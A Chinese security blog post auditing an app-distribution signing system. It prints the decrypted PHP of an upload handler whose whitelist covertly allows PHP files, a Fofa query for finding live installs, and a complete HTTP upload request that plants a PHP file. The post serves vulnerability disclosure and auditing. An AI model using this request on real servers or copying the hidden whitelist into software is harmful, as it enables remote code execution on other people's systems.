0x00 前言
Fofa:"statics/css/swiper.min.css" && "/user/messages/dialog"
0x01 前台任意文件上传漏洞
用Seay扫了一圈,发现在 /source/pack/upload/2upload 目录下的文件都进行了加密,但是是简单的eval加密,直接找在线解密的网站就可以直接解了,或者自行分析.
一个个解出来之后,基本都是白名单文件上传,但在 /source/pack/upload/2upload/index-uplog.php 文件中,我找到了不同之处,这个的上传白名单还加上了 pack('H*', 706870).
//解密的源码
if
(!
empty
($_FILES)) {
$filepart = pathinfo($_FILES[
'app'
][
'name'
]);
$extension = strtolower($filepart[
'extension'
]);
if
(in_array($extension,
array
(
'ipa'
,
'apk'
,
'mobileconfig'
, pack(
'H*'
,
706870
)))) {
$time = $_POST[
'time'
];
preg_match(
'/^(\d+\-\d+)$/'
, $time)
or
exit
(
'-1'
);
$dir =
'../../../data/tmp/'
. $time .
'/'
;
if
(!is_dir($dir)) {
@mkdir($dir,
0777
,
true
);
}
$file =
'../../../data/tmp/'
. $time .
'.'
. $extension;
@move_uploaded_file($_FILES[
'app'
][
'tmp_name'
], $file);
if
($extension ==
'ipa'
) {
include_once
'../zip/zip.php'
;
$zip =
new
PclZip($file);
$zip->extract(PCLZIP_OPT_PATH, $dir, PCLZIP_OPT_BY_PREG,
'/^Payload\/.*.app\/Info.plist$/'
);
$zip->extract(PCLZIP_OPT_PATH, $dir, PCLZIP_OPT_BY_PREG,
'/^Payload\/.*.app\/embedded.mobileprovision$/'
);
$zip->extract(PCLZIP_OPT_PATH, $dir, PCLZIP_OPT_BY_PREG,
'/^Payload\/.*.app\/(?!.*\/).*.png$/'
);
}
echo
"{'extension':'{$extension}','time':'{$time}'}"
;
}
else
{
echo
'-1'
;
}
}
pack('H*', 706870) 函数将数据装入了二进制,实际我们在外面运行一下代码就能的出来了
echo
pack(
'H*'
,
706870
);
实际上就是php,作者在这处文件上传的白名单里加入了php,再结合他将代码eval加密,其心可见一斑,诸君自行分辨.
我们直接上传文件还不行,他这里还有条正则限制: preg_match('/^(\d+\-\d+)$/', $time) or exit('-1'); 如果不符合正则直接返回-1,遇事不决直接问Chatgpt 4
可见传入参数中必须为数字且中间必须带 - 号,否则无法绕过此正则,So,咱们直接构造Payload:
POST
/source/pack/upload/2upload/index-uplog.php
HTTP/1.1
Accept
: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding
: gzip, deflate, br, zstd
Accept-Language
: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control
: max-age=0
Connection
: keep-alive
Content-Length
: 290
Content-Type
: multipart/form-data; boundary=----WebKitFormBoundaryfF7NbGp0PAFq8Mkd
Host
: 127.0.0.1
Origin
: http://127.0.0.1
Referer
: http://127.0.0.1/source/pack/upload/2upload/index-uplog.php
Sec-Fetch-Dest
: document
Sec-Fetch-Mode
: navigate
Sec-Fetch-Site
: none
Upgrade-Insecure-Requests
: 1
User-Agent
: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
sec-ch-ua
: "Google Chrome";v="125", "Chromium";v="125", "Not.A/Brand";v="24"
sec-ch-ua-mobile
: ?0
sec-ch-ua-platform
: "Windows"
sec-fetch-user
: ?1
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name=
"time"
1
-2
------WebKitFormBoundary03rNBzFMIytvpWhy
Content-Disposition: form-data; name=
"app"
; filename=
"1.php"
Content-Type: image/jpeg
phpinfo();
------WebKitFormBoundary03rNBzFMIytvpWhy--
文件上传在 /source/data/tmp/1-2.php
原文始发于微信公众号(星悦安全):某度APP分发签名系统审计
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论